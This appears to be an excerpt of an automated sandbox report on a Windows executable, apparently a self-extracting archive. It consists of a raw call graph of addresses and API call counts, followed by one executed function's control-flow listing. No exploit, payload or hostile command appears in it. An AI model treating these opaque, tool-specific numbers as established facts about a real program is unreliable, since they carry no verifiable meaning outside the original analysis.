cb4300 29420->29651 29424 c952e8 29423->29424 29425 c952e4 29423->29425 29434 c9e850 111 API calls 29424->29434 29425->29365 29426 c952fa 29427 c95323 29426->29427 29428 c95315 29426->29428 29678 c93d9d 131 API calls 3 library calls 29427->29678 29433 c95355 29428->29433 29677 c948aa 118 API calls 2 library calls 29428->29677 29431 c95321 29431->29433 29679 c9344b 89 API calls 29431->29679 29433->29365 29434->29426 29436 c9bf95 29435->29436 29441 c9bfc4 29436->29441 29501 c9c2fd 29436->29501 29777 cacdb4 135 API calls __EH_prolog3_GS 29436->29777 29438 c9d2e5 29439 c9d2ea 29438->29439 29440 c9d331 29438->29440 29439->29501 29848 c9ab88 185 API calls 29439->29848 29440->29501 29849 cacdb4 135 API calls __EH_prolog3_GS 29440->29849 29441->29438 29446 c9bfeb 29441->29446 29441->29501 29442 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29443 c9d327 29442->29443 29443->29365 29446->29501 29680 c97e1b 29446->29680 29448 c9c0c8 29692 ca106b 29448->29692 29452 c9c151 29456 c9c16f 29452->29456 29779 ca2095 45 API calls __EH_prolog3_GS 29452->29779 29454 c9c269 29461 c9c29b 29454->29461 29780 c919a9 26 API calls 29454->29780 29455 c9d205 29459 c9c948 29455->29459 29495 c9c743 29455->29495 29483 c9c239 29456->29483 29782 ca0ddb 28 API calls 29456->29782 29458 c9c374 29458->29455 29462 c9c3ea 29458->29462 29463 c9c3cf 29458->29463 29472 c9c97a 29459->29472 29815 c919a9 26 API calls 29459->29815 29461->29501 29781 c919a9 26 API calls 29461->29781 29477 c9c409 29462->29477 29784 c9b92d 56 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29462->29784 29464 c91a66 26 API calls 29463->29464 29468 c9c3da 29464->29468 29474 c91a66 26 API calls 29468->29474 29470 c9d276 29470->29501 29847 c919a9 26 API calls 29470->29847 29472->29501 29816 c919a9 26 API calls 29472->29816 29474->29501 29475 c9c33d _wcslen 29783 c9f103 52 API calls 2 library calls 29475->29783 29476 c9c4ea 29702 c9b2ee 29476->29702 29477->29476 29479 c9f711 53 API calls 29477->29479 29489 c9c49b 29479->29489 29482 c9c5c2 29484 c9c7d8 29482->29484 29488 c9c5cf 29482->29488 29483->29454 29483->29458 29793 ca2a36 115 API calls 29484->29793 29485 c91a66 26 API calls 29485->29476 29524 c9c62c 29488->29524 29787 c957c0 28 API calls 2 library calls 29488->29787 29489->29485 29492 c9c501 29498 c9c551 29492->29498 29785 c919a9 26 API calls 29492->29785 29493 c9c8f0 29502 c9c9eb 29493->29502 29519 c9c8ff 29493->29519 29494 c9c830 29494->29493 29503 c9c859 29494->29503 29495->29470 29846 c919a9 26 API calls 29495->29846 29498->29501 29786 c919a9 26 API calls 29498->29786 29501->29442 29515 c9c874 29502->29515 29708 c9b345 29502->29708 29508 c9ed0d 49 API calls 29503->29508 29510 c9ca64 29503->29510 29503->29515 29504 c9c940 29506 c9ddc7 114 API calls 29504->29506 29506->29459 29507 c9d1f2 29511 c9ddc7 114 API calls 29507->29511 29512 c9c8b3 29508->29512 29509 c9ca01 29513 c9ca05 29509->29513 29714 c9b778 29509->29714 29510->29507 29535 c9cac5 29510->29535 29817 c9e152 29510->29817 29511->29455 29512->29515 29795 c9d8b8 29512->29795 29516 c9ddc7 114 API calls 29513->29516 29515->29510 29515->29513 29526 c9b345 90 API calls 29515->29526 29516->29495 29519->29504 29814 c9b544 144 API calls __EH_prolog3_GS 29519->29814 29522 c9cb15 29529 c9fd70 28 API calls 29522->29529 29523 c9c77a 29792 c932d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29523->29792 29524->29495 29524->29523 29531 c9c781 29524->29531 29788 c9b015 28 API calls 29524->29788 29789 ca2a36 115 API calls 29524->29789 29790 c932d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29524->29790 29791 c9b8ed 89 API calls 29524->29791 29527 c9ca5e 29526->29527 29527->29510 29527->29513 29544 c9cb2f 29529->29544 29531->29494 29794 c9ede9 119 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29531->29794 29533 c9cab7 29821 c99653 109 API calls 29533->29821 29744 c9fd70 29535->29744 29536 c9cc21 29537 c9cf27 29536->29537 29538 c9cc76 29536->29538 29542 c9cf39 29537->29542 29543 c9cf50 29537->29543 29564 c9ccb5 29537->29564 29539 c9cd33 29538->29539 29541 c9cc94 29538->29541 29825 ca22b9 28 API calls 29539->29825 29547 c9ccd8 29541->29547 29556 c9cca3 29541->29556 29832 c9d771 29542->29832 29748 ca9625 29543->29748 29544->29536 29822 c9e39d 8 API calls 29544->29822 29546 c9cd69 29550 ca106b 45 API calls 29546->29550 29547->29564 29824 c9a7a2 142 API calls 29547->29824 29549 c9cf73 29764 ca94ea 29549->29764 29554 c9cd76 29550->29554 29826 c9b92d 56 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29554->29826 29823 c932d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29556->29823 29559 c9cdaf 29560 c9cddd 29559->29560 29561 c9cdcd 29559->29561 29562 c9cddf 29559->29562 29567 c9ce3e 29560->29567 29829 c919a9 26 API calls 29560->29829 29827 c9a496 119 API calls 29561->29827 29828 c9d3d7 135 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29562->29828 29569 c9cf15 29564->29569 29831 c9fd28 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29564->29831 29567->29564 29830 c919a9 26 API calls 29567->29830 29571 c9d044 29569->29571 29843 c932d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29569->29843 29571->29507 29572 c9d161 29571->29572 29573 c9d115 29571->29573 29771 c9e8d9 SetEndOfFile 29571->29771 29572->29507 29577 c9f58b 49 API calls 29572->29577 29772 c9e772 29573->29772 29576 c9d159 29578 c9de50 110 API calls 29576->29578 29579 c9d1d2 29577->29579 29578->29572 29579->29507 29844 c932d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29579->29844 29581 c9d1e8 29845 c99500 109 API calls __EH_prolog3_GS 29581->29845 29584 c9233e 29583->29584 29588 c92350 29583->29588 29584->29588 30037 c923b0 26 API calls 29584->30037 29585 c91a66 26 API calls 29587 c92369 29585->29587 30038 c92ed0 26 API calls 29587->30038 29588->29585 29590 c92374 30039 c924d9 26 API calls 29590->30039 29607 c9e927 29606->29607 29609 c9e931 29607->29609 30040 c993d7 110 API calls __EH_prolog3_GS 29607->30040 29609->29347 29610->29372 29611->29372 29613 c976f3 __EH_prolog3 29612->29613 29628 ca0aaf 29613->29628 29615 c976fd 29631 ca4f2b 29615->29631 29617 c97874 29635 c97cba GetCurrentProcess GetProcessAffinityMask 29617->29635 29619 c97891 29619->29392 29621 ca028f _abort 29620->29621 29646 ca0152 29621->29646 29624 c91a66 26 API calls 29625 ca02b4 29624->29625 29626 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29625->29626 29627 ca02bf 29626->29627 29627->29393 29636 ca0b05 29628->29636 29632 ca4f37 __EH_prolog3 29631->29632 29645 c91ece 28 API calls 29632->29645 29634 ca4f50 29634->29617 29635->29619 29637 ca0b17 _abort 29636->29637 29640 ca76e5 29637->29640 29643 ca76a7 GetCurrentProcess GetProcessAffinityMask 29640->29643 29644 ca0b01 29643->29644 29644->29615 29645->29634 29647 c925a4 26 API calls 29646->29647 29648 ca01c7 29647->29648 29648->29624 29649->29406 29650->29411 29652 cb430c __EH_prolog3_GS 29651->29652 29653 ca2117 45 API calls 29652->29653 29654 cb432f 29653->29654 29655 ca4318 53 API calls 29654->29655 29656 cb4342 29655->29656 29657 ca6a25 53 API calls 29656->29657 29658 cb434c 29657->29658 29659 c91a66 26 API calls 29658->29659 29660 cb435b 29659->29660 29667 cb3ec5 29660->29667 29663 c91a66 26 API calls 29664 cb4375 29663->29664 29665 cb5787 5 API calls 29664->29665 29666 ca8665 29665->29666 29666->29365 29668 cb3ed1 __EH_prolog3_GS 29667->29668 29669 c914a7 28 API calls 29668->29669 29670 cb3edd 29669->29670 29671 cb3572 21 API calls 29670->29671 29672 cb3eec 29671->29672 29673 c91a66 26 API calls 29672->29673 29674 cb3ef4 29673->29674 29675 cb5787 5 API calls 29674->29675 29676 cb3ef9 29675->29676 29676->29663 29677->29431 29678->29431 29679->29433 29681 c97e27 __EH_prolog3_GS 29680->29681 29850 c97bfc 29681->29850 29683 c97e6c 29684 cb5787 5 API calls 29683->29684 29685 c97ecf 29684->29685 29685->29448 29686 c97e68 29686->29683 29689 c97ed2 29686->29689 29691 c97ebe 29686->29691 29855 c97bd6 30 API calls 29686->29855 29688 c91a66 26 API calls 29688->29683 29689->29691 29856 c9adaa CompareStringW 29689->29856 29691->29688 29701 ca1095 29692->29701 29693 ca1256 29695 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29693->29695 29694 c9769f 45 API calls 29696 ca1241 29694->29696 29697 c9c11b 29695->29697 29698 c925a4 26 API calls 29696->29698 29697->29456 29778 ca2095 45 API calls __EH_prolog3_GS 29697->29778 29699 ca124d 29698->29699 29700 c91a66 26 API calls 29699->29700 29700->29693 29701->29693 29701->29694 29703 c9b303 29702->29703 29704 c9b33b 29703->29704 29899 c99635 89 API calls 29703->29899 29704->29482 29704->29492 29706 c9b333 29900 c9204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29706->29900 29709 c9b368 29708->29709 29711 c9b39e 29708->29711 29709->29711 29901 ca85fd 75 API calls 29709->29901 29711->29509 29712 c9b39a 29712->29711 29902 c932a1 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29712->29902 29715 c9b784 __EH_prolog3_GS 29714->29715 29716 c9b8e3 29715->29716 29718 c9d8b8 138 API calls 29715->29718 29717 cb5787 5 API calls 29716->29717 29720 c9b8ea 29717->29720 29719 c9b7ef 29718->29719 29719->29716 29903 c99283 109 API calls 29719->29903 29720->29515 29722 c9b817 29723 c9ed0d 49 API calls 29722->29723 29724 c9b81d 29723->29724 29725 c9b838 29724->29725 29726 c9ed1f 49 API calls 29724->29726 29905 ca1a27 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29725->29905 29731 c9b827 29726->29731 29728 c9b83e 29728->29716 29906 c9204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29728->29906 29730 c9b850 29732 c97673 28 API calls 29730->29732 29731->29725 29904 c932a1 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29731->29904 29735 c9b859 29732->29735 29734 c9b88d 29736 c9eaf3 54 API calls 29734->29736 29741 c9b8c9 29734->29741 29735->29734 29907 c9ede9 119 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29735->29907 29738 c9b8a1 29736->29738 29739 c9d8b8 138 API calls 29738->29739 29740 c9b8c5 29739->29740 29740->29741 29908 c99283 109 API calls 29740->29908 29742 c91a66 26 API calls 29741->29742 29742->29716 29745 c9fd7e 29744->29745 29747 c9fd88 29744->29747 29746 cb56f6 28 API calls 29745->29746 29746->29747 29747->29522 29749 ca9639 29748->29749 29750 ca9644 29749->29750 29751 ca975f 29749->29751 29753 ca96ed 29750->29753 29754 cbd08c ___std_exception_copy 21 API calls 29750->29754 29757 ca970b 29750->29757 29758 ca9739 29750->29758 29752 cb734a _com_raise_error RaiseException 29751->29752 29752->29757 29756 ca971f 29753->29756 29753->29757 29753->29758 29754->29753 29755 cb734a _com_raise_error RaiseException 29762 ca97a3 __EH_prolog3 _abort 29755->29762 29756->29758 29909 ca9556 89 API calls 4 library calls 29756->29909 29757->29755 29758->29549 29760 ca9896 29760->29549 29761 cbd08c ___std_exception_copy 21 API calls 29761->29762 29762->29760 29762->29761 29910 c99384 89 API calls 29762->29910 29766 ca94f3 29764->29766 29765 ca951f 29926 caabc8 155 API calls 29765->29926 29766->29765 29767 ca9515 29766->29767 29770 ca951d 29766->29770 29911 cab76f 29767->29911 29770->29564 29771->29573 29773 c9e783 29772->29773 29775 c9e792 29772->29775 29774 c9e789 FlushFileBuffers 29773->29774 29773->29775 29774->29775 29776 c9e80f SetFileTime 29775->29776 29776->29576 29777->29441 29778->29452 29779->29456 29780->29461 29781->29501 29782->29475 29783->29483 29784->29477 29785->29498 29786->29501 29787->29524 29788->29524 29789->29524 29790->29524 29791->29524 29792->29531 29793->29531 29794->29494 29796 c9d8c5 29795->29796 29797 c9ed0d 49 API calls 29796->29797 29806 c9d8d7 29797->29806 29798 c9d93e 29799 c9d953 29798->29799 29801 c9de9a 49 API calls 29798->29801 29804 c9eaf3 54 API calls 29799->29804 29811 c9d957 29799->29811 29800 c9d8e8 29800->29806 30005 c9d990 125 API calls __EH_prolog3_GS 29800->30005 29801->29799 29805 c9d973 29804->29805 29807 c9d982 29805->29807 29808 c9d977 29805->29808 29806->29798 29806->29800 29809 c9ed0d 49 API calls 29806->29809 29806->29811 30006 ca846c 61 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29806->30006 30007 c992e6 RaiseException _com_raise_error 29806->30007 29810 c9ec63 49 API calls 29807->29810 29812 c9de9a 49 API calls 29808->29812 29809->29806 29810->29811 29811->29515 29812->29811 29814->29504 29815->29472 29816->29501 29818 c9caa5 29817->29818 29819 c9e15b GetFileType 29817->29819 29818->29535 29820 c932d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29818->29820 29819->29818 29820->29533 29821->29535 29822->29536 29823->29564 29824->29564 29825->29546 29826->29559 29827->29560 29828->29560 29829->29567 29830->29564 29831->29569 29833 c9d77d __EH_prolog3 29832->29833 29834 c911dd 28 API calls 29833->29834 29835 c9d788 29834->29835 29836 ca2af9 150 API calls 29835->29836 29837 c9d7b1 29836->29837 29838 c9d804 29837->29838 29842 ca2af9 150 API calls 29837->29842 30008 ca2ce5 29837->30008 29840 c9d828 29838->29840 30016 c919a9 26 API calls 29838->30016 29840->29564 29842->29837 29843->29571 29844->29581 29845->29507 29846->29470 29847->29501 29848->29501 29849->29501 29857 c9790e 29850->29857 29852 c97c1d 29852->29686 29854 c9790e 47 API calls 29854->29852 29855->29686 29856->29691 29858 ca106b 45 API calls 29857->29858 29875 c97989 _wcslen 29858->29875 29859 c97b1b 29864 c97b4a 29859->29864 29888 c919a9 26 API calls 29859->29888 29860 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29863 c97bbb 29860->29863 29863->29852 29863->29854 29865 c97b92 29864->29865 29889 c919a9 26 API calls 29864->29889 29865->29860 29866 ca2117 45 API calls 29866->29875 29867 c97673 28 API calls 29867->29875 29869 ca106b 45 API calls 29869->29875 29870 c9769f 45 API calls 29870->29875 29871 c91a66 26 API calls 29871->29875 29873 c97bc2 29874 c91a66 26 API calls 29873->29874 29876 c97bc7 29874->29876 29875->29859 29875->29866 29875->29867 29875->29869 29875->29870 29875->29871 29875->29873 29879 ca1a9f 29875->29879 29883 c91b63 29875->29883 29887 c97bd6 30 API calls 29875->29887 29877 c91a66 26 API calls 29876->29877 29877->29859 29880 ca1ab1 29879->29880 29890 c996e5 29880->29890 29884 c91b6f 29883->29884 29885 c91b8e 29883->29885 29884->29875 29898 c913f7 28 API calls 29885->29898 29887->29875 29888->29864 29889->29865 29891 c996f1 _wcslen 29890->29891 29894 c990f4 29891->29894 29897 c99137 _abort 29894->29897 29895 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29896 c991a9 29895->29896 29896->29875 29897->29895 29898->29884 29899->29706 29900->29704 29901->29712 29902->29711 29903->29722 29904->29725 29905->29728 29906->29730 29907->29734 29908->29741 29909->29758 29910->29762 29927 ca97a4 29911->29927 29914 cabb9c 29957 caa814 129 API calls __InternalCxxFrameHandler 29914->29957 29916 cabbb5 __InternalCxxFrameHandler 29917 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29916->29917 29918 cabbfc 29917->29918 29918->29770 29921 cab78e __InternalCxxFrameHandler 29921->29914 29932 ca2af9 29921->29932 29943 ca7590 29921->29943 29949 caa008 150 API calls 29921->29949 29950 cabc05 150 API calls 29921->29950 29951 ca77cf 29921->29951 29955 ca9a2b 129 API calls 29921->29955 29956 cac27f 155 API calls 29921->29956 29926->29770 29929 ca97b0 __EH_prolog3 _abort 29927->29929 29928 ca9896 29928->29921 29929->29928 29930 cbd08c ___std_exception_copy 21 API calls 29929->29930 29958 c99384 89 API calls 29929->29958 29930->29929 29941 ca2b0f __InternalCxxFrameHandler 29932->29941 29933 ca2c7f 29934 ca2cb3 29933->29934 29959 ca2ab0 29933->29959 29936 ca2cd4 29934->29936 29965 c982a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29934->29965 29966 ca73f8 29936->29966 29940 ca2c76 29940->29921 29941->29933 29941->29940 29963 c9fe6f 123 API calls __EH_prolog3 29941->29963 29964 cacdb4 135 API calls __EH_prolog3_GS 29941->29964 29944 ca759c 29943->29944 29945 ca75a1 29943->29945 29982 ca7628 29944->29982 29947 ca75b1 29945->29947 29948 ca77cf 113 API calls 29945->29948 29947->29921 29948->29947 29949->29921 29950->29921 29952 ca77db ResetEvent ReleaseSemaphore 29951->29952 29953 ca7806 29951->29953 29997 ca75ed WaitForSingleObject 29952->29997 29953->29921 29955->29921 29956->29921 29957->29916 29958->29929 29960 ca2ab8 29959->29960 29961 ca2af5 29959->29961 29960->29961 29972 ca8618 29960->29972 29961->29934 29963->29941 29964->29941 29965->29936 29967 ca73ff 29966->29967 29968 ca741a 29967->29968 29980 c992e6 RaiseException _com_raise_error 29967->29980 29970 ca742b SetThreadExecutionState 29968->29970 29981 c992e6 RaiseException _com_raise_error 29968->29981 29970->29940 29975 cb4231 29972->29975 29976 ca60d5 29975->29976 29977 cb4248 SendDlgItemMessageW 29976->29977 29978 cb0678 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 29977->29978 29979 ca8638 29978->29979 29979->29961 29980->29968 29981->29970 29983 ca76a1 29982->29983 29984 ca7633 29982->29984 29983->29945 29984->29983 29985 ca7638 CreateThread 29984->29985 29986 ca7690 SetThreadPriority 29984->29986 29990 c992eb 109 API calls __EH_prolog3_GS 29984->29990 29991 c99500 109 API calls __EH_prolog3_GS 29984->29991 29992 c992e6 RaiseException _com_raise_error 29984->29992 29985->29984 29993 ca7760 29985->29993 29986->29984 29990->29984 29991->29984 29992->29984 29996 ca776e 116 API calls 29993->29996 29995 ca7769 29996->29995 29998 ca75fe GetLastError 29997->29998 30002 ca7624 29997->30002 30003 c992eb 109 API calls __EH_prolog3_GS 29998->30003 30000 ca7618 30004 c992e6 RaiseException _com_raise_error 30000->30004 30002->29953 30003->30000 30004->30002 30005->29800 30006->29806 30007->29806 30009 ca2d18 30008->30009 30012 ca2cfe __InternalCxxFrameHandler 30008->30012 30009->30012 30017 c9e948 30009->30017 30011 ca2d42 30014 ca73f8 2 API calls 30011->30014 30012->30011 30034 c9fe6f 123 API calls __EH_prolog3 30012->30034 30015 ca2d47 30014->30015 30015->29837 30016->29840 30018 c9e954 __EH_prolog3_GS 30017->30018 30019 c9e976 GetStdHandle 30018->30019 30023 c9e963 30018->30023 30033 c9e988 30018->30033 30019->30033 30020 cb5787 5 API calls 30022 c9eaab 30020->30022 30021 c9e9df WriteFile 30021->30033 30022->30012 30023->30020 30024 c9e9af WriteFile 30025 c9e9ad 30024->30025 30024->30033 30025->30024 30025->30033 30027 c9ea77 30028 c914a7 28 API calls 30027->30028 30029 c9ea84 30028->30029 30036 c99653 109 API calls 30029->30036 30031 c9ea97 30032 c91a66 26 API calls 30031->30032 30032->30023 30033->30021 30033->30023 30033->30024 30033->30025 30033->30027 30035 c99230 111 API calls 30033->30035 30034->30011 30035->30033 30036->30031 30038->29590 30040->29609 30042 c9f835 __EH_prolog3_GS 30041->30042 30043 c9f925 FindNextFileW 30042->30043 30044 c9f847 FindFirstFileW 30042->30044 30045 c9f948 30043->30045 30046 c9f937 GetLastError 30043->30046 30044->30045 30048 c9f86a 30044->30048 30052 c914a7 28 API calls 30045->30052 30064 c9f90d 30046->30064 30049 ca169a 47 API calls 30048->30049 30050 c9f88c 30049->30050 30055 c9f899 30050->30055 30056 c9f89c FindFirstFileW 30050->30056 30057 c9f8ac 30050->30057 30051 cb5787 5 API calls 30053 c9f733 30051->30053 30054 c9f95f 30052->30054 30053->29378 30053->29382 30058 ca229d 45 API calls 30054->30058 30055->30056 30056->30057 30063 c9f8e8 30057->30063 30065 c919a9 26 API calls 30057->30065 30059 c9f970 30058->30059 30062 c91a66 26 API calls 30059->30062 30060 c9f902 GetLastError 30060->30064 30062->30064 30063->30045 30063->30060 30064->30051 30065->30063 30067 c9d70b 30066->30067 30072 c9d6e5 30066->30072 30102 c9d89e 30067->30102 30070 c9ec63 49 API calls 30070->30072 30071 c9b231 26 API calls 30073 c9d74c 30071->30073 30072->30067 30072->30070 30074 c91a66 26 API calls 30073->30074 30075 c9d755 30074->30075 30076 c91a66 26 API calls 30075->30076 30077 c9d75e 30076->30077 30078 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30077->30078 30079 c9b1bf 30078->30079 30079->29312 30086 ca909b 30079->30086 30081 ca28bb 30080->30081 30107 c9fb8e 30081->30107 30083 ca28ed 30084 c9fb8e 118 API calls 30083->30084 30085 ca28f8 30084->30085 30087 ca90aa 30086->30087 30088 ca74ec 118 API calls 30087->30088 30089 ca90b9 30087->30089 30088->30089 30118 ca4264 26 API calls 30089->30118 30091 ca90e8 30119 ca4264 26 API calls 30091->30119 30093 ca90f3 30120 ca4264 26 API calls 30093->30120 30095 ca90fe 30121 ca4288 26 API calls 30095->30121 30097 ca9132 30098 c92e8b 26 API calls 30097->30098 30099 ca913a 30098->30099 30100 c92e8b 26 API calls 30099->30100 30101 ca9142 30100->30101 30103 c9d8a8 30102->30103 30104 c9d714 30102->30104 30106 c9ae77 26 API calls 30103->30106 30104->30071 30106->30104 30108 c9fbbb 30107->30108 30110 c9fbc2 30107->30110 30111 ca74ec 30108->30111 30110->30083 30112 ca77cf 113 API calls 30111->30112 30113 ca7518 ReleaseSemaphore 30112->30113 30114 ca7538 30113->30114 30115 ca7556 DeleteCriticalSection CloseHandle CloseHandle 30113->30115 30116 ca75ed 111 API calls 30114->30116 30115->30110 30117 ca7542 CloseHandle 30116->30117 30117->30114 30117->30115 30118->30091 30119->30093 30120->30095 30121->30097 30131 caeac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 30122->30131 30124 caeaad 30126 caeab9 30124->30126 30132 caeae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 30124->30132 30126->29093 30126->29094 30127->29099 30128->29105 30129->29105 30130->29108 30131->30124 30132->30126 30133->29116 30135 c9e910 110 API calls 30134->30135 30136 c92dc7 30135->30136 30137 c927e0 133 API calls 30136->30137 30140 c92de4 30136->30140 30138 c92dd4 30137->30138 30138->30140 30145 c9204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 30138->30145 30140->29126 30140->29127 30142 c9279b 30141->30142 30144 c92797 30141->30144 30146 c926d2 30142->30146 30144->29132 30145->30140 30147 c926e4 30146->30147 30148 c92721 30146->30148 30149 c952d8 133 API calls 30147->30149 30154 c95767 30148->30154 30152 c92704 30149->30152 30152->30144 30158 c95770 30154->30158 30155 c952d8 133 API calls 30155->30158 30156 c92742 30156->30152 30159 c92c30 30156->30159 30157 ca73f8 2 API calls 30157->30158 30158->30155 30158->30156 30158->30157 30160 c92c3c __EH_prolog3_GS 30159->30160 30181 c95365 30160->30181 30162 c92c8f 30169 c92d02 30162->30169 30217 c919a9 26 API calls 30162->30217 30163 cb5787 5 API calls 30166 c92d18 30163->30166 30164 c92c5a 30164->30162 30167 c92c91 30164->30167 30168 c92c86 30164->30168 30166->30152 30171 c92cb9 30167->30171 30172 c92c9a 30167->30172 30213 ca888c 28 API calls 30168->30213 30169->30163 30215 ca8707 29 API calls 2 library calls 30171->30215 30214 ca880e 28 API calls __EH_prolog3 30172->30214 30174 c92ca7 30175 c925a4 26 API calls 30174->30175 30177 c92caf 30175->30177 30179 c91a66 26 API calls 30177->30179 30178 c92cd2 30216 c92ed0 26 API calls 30178->30216 30179->30162 30182 c95380 30181->30182 30183 c953ca 30182->30183 30184 c953ae 30182->30184 30185 c95634 30183->30185 30189 c953f6 30183->30189 30218 c9204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 30184->30218 30224 c9204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 30185->30224 30188 c953b9 30190 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30188->30190 30189->30188 30192 ca9625 89 API calls 30189->30192 30191 c95659 30190->30191 30191->30164 30197 c95449 30192->30197 30193 c9547b 30195 c9550d 30193->30195 30212 c95472 30193->30212 30221 ca2a36 115 API calls 30193->30221 30194 c95477 30194->30193 30220 c9315d 28 API calls 30194->30220 30196 c9fd70 28 API calls 30195->30196 30199 c95520 30196->30199 30197->30193 30197->30194 30198 c95467 30197->30198 30219 c9204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 30198->30219 30204 c955b9 30199->30204 30205 c955a9 30199->30205 30201 ca909b 118 API calls 30201->30188 30207 ca94ea 155 API calls 30204->30207 30206 c9d771 155 API calls 30205->30206 30208 c955b7 30206->30208 30207->30208 30222 c9fd28 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 30208->30222 30210 c955f1 30210->30212 30223 c932d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 30210->30223 30212->30201 30213->30162 30214->30174 30215->30178 30216->30162 30217->30169 30218->30188 30219->30212 30220->30193 30221->30195 30222->30210 30223->30212 30224->30188 30225 cb4a07 30226 cb4910 30225->30226 30227 cb4fce ___delayLoadHelper2@8 17 API calls 30226->30227 30227->30226 30228 c9e3d5 30229 c9e3df 30228->30229 30232 c9e551 SetFilePointer 30229->30232 30233 c9e403 30229->30233 30230 cb5734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30231 c9e481 30230->30231 30232->30233 30234 c9e56e GetLastError 30232->30234 30233->30230 30234->30233 30235 c91125 30236 c976e7 30 API calls 30235->30236 30237 c9112a 30236->30237 30240 cb6029 29 API calls 30237->30240 30239 c91134 30240->30239

                                              Executed Functions

                                              Function 00CB454A Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 252filesleeptimeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 502 cb454a-cb4612 call ca6d7b call ca1309 call caf4d4 call cb71f0 call caf89a call caf84c GetCommandLineW 515 cb46f9-cb4722 call ca13f9 call c925a4 call c91a66 502->515 516 cb4618-cb463c call c914a7 call cb19ee call c91a66 502->516 529 cb4729-cb4831 SetEnvironmentVariableW GetLocalTime call c9f6ba SetEnvironmentVariableW GetModuleHandleW LoadIconW call cb07e5 call ca3538 call cad255 * 2 DialogBoxParamW call cad347 * 2 515->529 530 cb4724 515->530 531 cb46dc-cb46f4 call c914a7 call cb3efc call c91a66 516->531 532 cb4642-cb4659 OpenFileMappingW 516->532 566 cb483a-cb4841 529->566 567 cb4833-cb4834 Sleep 529->567 530->529 531->515 535 cb465b-cb4669 MapViewOfFile 532->535 536 cb46d2-cb46da CloseHandle 532->536 535->536 539 cb466b-cb4687 UnmapViewOfFile MapViewOfFile 535->539 536->515 539->536 542 cb4689-cb46cc call cafc38 call cb3efc call ca5109 call ca51bf call ca51f8 UnmapViewOfFile 539->542 542->536 568 cb4848-cb4865 call ca5041 DeleteObject 566->568 569 cb4843 call cafb4b 566->569 567->566 573 cb486e-cb4874 568->573 574 cb4867-cb4868 DeleteObject 568->574 569->568 575 cb488e-cb489c 573->575 576 cb4876-cb487d 573->576 574->573 578 cb489e-cb48aa call cb3fcf CloseHandle 575->578 579 cb48b0-cb48bd 575->579 576->575 577 cb487f-cb4889 call c994b8 576->577 577->575 578->579 582 cb48bf-cb48cb 579->582 583 cb48e1-cb48e5 call caf53a 579->583 585 cb48db-cb48dd 582->585 586 cb48cd-cb48d5 582->586 590 cb48ea-cb4903 call cb5734 583->590 585->583 589 cb48df 585->589 586->583 588 cb48d7-cb48d9 586->588 588->583 589->583
                                              APIs
                                                • Part of subcall function 00CA6D7B: GetModuleHandleW.KERNEL32(kernel32,9CAA5719), ref: 00CA6DC7
                                                • Part of subcall function 00CA6D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CA6DD9
                                                • Part of subcall function 00CA6D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CA6E03
                                                • Part of subcall function 00CA1309: __EH_prolog3.LIBCMT ref: 00CA1310
                                                • Part of subcall function 00CA1309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00CA17FB,?,?,\\?\,9CAA5719,?,?,?,00000000,00CCA279,000000FF), ref: 00CA1319
                                                • Part of subcall function 00CAF4D4: OleInitialize.OLE32(00000000), ref: 00CAF4ED
